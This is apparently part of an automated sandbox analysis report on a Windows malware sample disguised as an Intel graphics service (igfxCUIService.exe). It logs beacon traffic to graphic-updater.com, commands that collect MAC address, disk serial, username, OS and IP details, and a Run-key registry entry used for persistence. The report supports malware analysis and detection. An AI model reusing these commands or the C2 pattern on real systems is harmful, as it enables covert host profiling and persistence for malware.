                                        2022-01-11 16:09:06 UTC7OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:06 UTC8INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:06 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 56
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:06 UTC8INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        50192.168.2.44985623.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:30 UTC40OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:30 UTC40OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:30 UTC40INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:30 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 15
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:30 UTC41INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        51192.168.2.44985723.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:30 UTC40OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:30 UTC40OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:30 UTC41INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:30 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 14
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:30 UTC41INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        52192.168.2.44986123.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:30 UTC41OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:30 UTC41OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:31 UTC42INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:31 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 13
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:31 UTC42INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        53192.168.2.44986323.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:31 UTC41OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:31 UTC41OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:31 UTC42INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:31 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 12
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:31 UTC42INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        54192.168.2.44986423.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:31 UTC41OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:31 UTC42OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:31 UTC42INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:31 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 11
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:31 UTC43INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        6192.168.2.44979923.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:07 UTC8OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:07 UTC8OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:07 UTC8INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:07 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 55
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:07 UTC8INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        7192.168.2.44980023.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:08 UTC8OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:08 UTC8OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:08 UTC9INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:08 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 54
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:08 UTC9INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        8192.168.2.44980123.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:08 UTC9OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:08 UTC9OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:09 UTC9INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:09 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 53
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:09 UTC9INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        9192.168.2.44980223.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:09 UTC9OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:09 UTC9OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:10 UTC9INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:09 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 52
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:10 UTC10INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Code Manipulations

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        Analysis Process: IGFXCUISERVICE.exe PID: 7144 Parent PID: 64

                                        General

                                        Start time:17:07:27
                                        Start date:11/01/2022
                                        Path:C:\Users\user\Desktop\IGFXCUISERVICE.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\IGFXCUISERVICE.exe"
                                        Imagebase:0x12a0000
                                        File size:401920 bytes
                                        MD5 hash:D90D0F4D6DAD402B5D025987030CC87C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        Analysis Process: powershell.exe PID: 3160 Parent PID: 7144

                                        General

                                        Start time:17:07:29
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\IGFXCUISERVICE.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'
                                        Imagebase:0x1280000
                                        File size:430592 bytes
                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:high

                                        Analysis Process: conhost.exe PID: 4672 Parent PID: 3160

                                        General

                                        Start time:17:07:29
                                        Start date:11/01/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Analysis Process: igfxCUIService.exe PID: 5780 Parent PID: 7144

                                        General

                                        Start time:17:07:56
                                        Start date:11/01/2022
                                        Path:C:\ProgramData\SystemData\igfxCUIService.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\ProgramData\SystemData\igfxCUIService.exe"
                                        Imagebase:0x290000
                                        File size:401920 bytes
                                        MD5 hash:D90D0F4D6DAD402B5D025987030CC87C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 20%, Metadefender, Browse
                                        • Detection: 42%, ReversingLabs
                                        Reputation:low

                                        Analysis Process: powershell.exe PID: 6936 Parent PID: 5780

                                        General

                                        Start time:17:07:58
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
                                        Imagebase:0x1280000
                                        File size:430592 bytes
                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:high

                                        Analysis Process: conhost.exe PID: 6440 Parent PID: 6936

                                        General

                                        Start time:17:07:58
                                        Start date:11/01/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Analysis Process: getmac.exe PID: 6608 Parent PID: 6936

                                        General

                                        Start time:17:08:25
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\getmac.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\getmac.exe
                                        Imagebase:0xd10000
                                        File size:65536 bytes
                                        MD5 hash:6AB605BD2223BFB2E55A466BE9816914
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        Analysis Process: WMIC.exe PID: 984 Parent PID: 6936

                                        General

                                        Start time:17:08:29
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber
                                        Imagebase:0xc20000
                                        File size:391680 bytes
                                        MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Analysis Process: powershell.exe PID: 6036 Parent PID: 5780

                                        General

                                        Start time:17:08:40
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
                                        Imagebase:0x1280000
                                        File size:430592 bytes
                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:high

                                        Analysis Process: conhost.exe PID: 4240 Parent PID: 6036

                                        General

                                        Start time:17:08:41
                                        Start date:11/01/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Analysis Process: cmd.exe PID: 5592 Parent PID: 5780

                                        General

                                        Start time:17:08:45
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\cmd.exe" /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > "C:\ProgramData\SystemData\tempo1.txt" && type "C:\ProgramData\SystemData\tempo1.txt" > "C:\ProgramData\SystemData\tempo2.txt
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Analysis Process: conhost.exe PID: 5388 Parent PID: 5592

                                        General

                                        Start time:17:08:46
                                        Start date:11/01/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Analysis Process: WMIC.exe PID: 6628 Parent PID: 5592

                                        General

                                        Start time:17:08:46
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                        Wow64 process (32bit):true
                                        Commandline:wmic OS get Caption, CSDVersion, OSArchitecture, Version / value
                                        Imagebase:0xc20000
                                        File size:391680 bytes
                                        MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Analysis Process: cmd.exe PID: 5508 Parent PID: 5780

                                        General

                                        Start time:17:08:52
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\cmd.exe" /c wmic nicconfig where 'IPEnabled = True' get ipaddress > "C:\ProgramData\SystemData\tempi1.txt" && type "C:\ProgramData\SystemData\tempi1.txt" > "C:\ProgramData\SystemData\tempi2.txt
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Analysis Process: conhost.exe PID: 5584 Parent PID: 5508

                                        General

                                        Start time:17:08:52
                                        Start date:11/01/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Analysis Process: WMIC.exe PID: 7164 Parent PID: 5508

                                        General

                                        Start time:17:08:53
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                        Wow64 process (32bit):true
                                        Commandline:wmic nicconfig where 'IPEnabled = True' get ipaddress
                                        Imagebase:0xc20000
                                        File size:391680 bytes
                                        MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Analysis Process: cmd.exe PID: 4676 Parent PID: 5780

                                        General

                                        Start time:17:09:00
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Analysis Process: conhost.exe PID: 5260 Parent PID: 4676

                                        General

                                        Start time:17:09:01
                                        Start date:11/01/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Analysis Process: reg.exe PID: 6752 Parent PID: 4676

                                        General

                                        Start time:17:09:01
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                        Imagebase:0x3f0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Analysis Process: igfxCUIService.exe PID: 5788 Parent PID: 3424

                                        General

                                        Start time:17:09:12
                                        Start date:11/01/2022
                                        Path:C:\ProgramData\SystemData\igfxCUIService.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\ProgramData\SystemData\igfxCUIService.exe"
                                        Imagebase:0x290000
                                        File size:401920 bytes
                                        MD5 hash:D90D0F4D6DAD402B5D025987030CC87C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Analysis Process: cmd.exe PID: 2248 Parent PID: 5788

                                        General

                                        Start time:17:09:14
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Analysis Process: conhost.exe PID: 4100 Parent PID: 2248

                                        General

                                        Start time:17:09:15
                                        Start date:11/01/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Analysis Process: reg.exe PID: 1472 Parent PID: 2248

                                        General

                                        Start time:17:09:15
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                        Imagebase:0x3f0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Analysis Process: igfxCUIService.exe PID: 6380 Parent PID: 3424

                                        General

                                        Start time:17:09:21
                                        Start date:11/01/2022
                                        Path:C:\ProgramData\SystemData\igfxCUIService.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\ProgramData\SystemData\igfxCUIService.exe"
                                        Imagebase:0x290000
                                        File size:401920 bytes
                                        MD5 hash:D90D0F4D6DAD402B5D025987030CC87C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Analysis Process: cmd.exe PID: 6440 Parent PID: 6380

                                        General

                                        Start time:17:09:25
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Analysis Process: conhost.exe PID: 6432 Parent PID: 6440

                                        General

                                        Start time:17:09:25
                                        Start date:11/01/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Analysis Process: reg.exe PID: 740 Parent PID: 6440

                                        General

                                        Start time:17:09:25
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                        Imagebase:0x3f0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Disassembly

                                        Code Analysis

                                        Reset < >